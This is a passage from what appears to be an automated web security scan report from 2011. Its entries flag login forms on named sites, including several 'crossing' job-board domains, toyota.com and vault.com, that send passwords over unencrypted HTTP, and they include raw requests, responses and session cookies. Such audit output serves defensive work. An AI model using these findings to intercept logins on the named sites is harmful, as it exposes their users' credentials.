User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sellingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.108. http://www.sqlcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sqlcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sqlcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.109. http://www.teenagercrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.teenagercrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.teenagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.110. http://www.telecomcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.telecomcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.telecomcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.111. http://www.toyota.com/owners/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/owners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.toyota.com/owners/apps/login_precheck.do

The form contains the following password field:

password

Request

GET /owners/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="login">
        <form method="post" action="/owners/apps/login_precheck.do" id="mytoyotaLoginForm" name="mytoyotaLoginForm">
               <div class="leftnav_title">
...[SNIP]...
<div class="search_outer">
               <input type="password" class="searchbox" name="password" id="password" onkeypress="clickSubmitOnEnter(event);"/>
            </div>
...[SNIP]...

6.112. http://www.tradingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.tradingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tradingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.113. http://www.trainingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.trainingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.trainingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.114. http://www.transportationcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.transportationcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.transportationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.115. http://www.travelingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.travelingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.travelingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.116. http://www.truckingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.truckingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.truckingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.117. http://www.tvcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.tvcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tvcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.118. http://www.underwritingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.underwritingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.underwritingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.119. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9NNGhyUDM0MzgwMDA5LzIyMjA5L2xp/

The form contains the following password fields:

password
UserConfirm

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
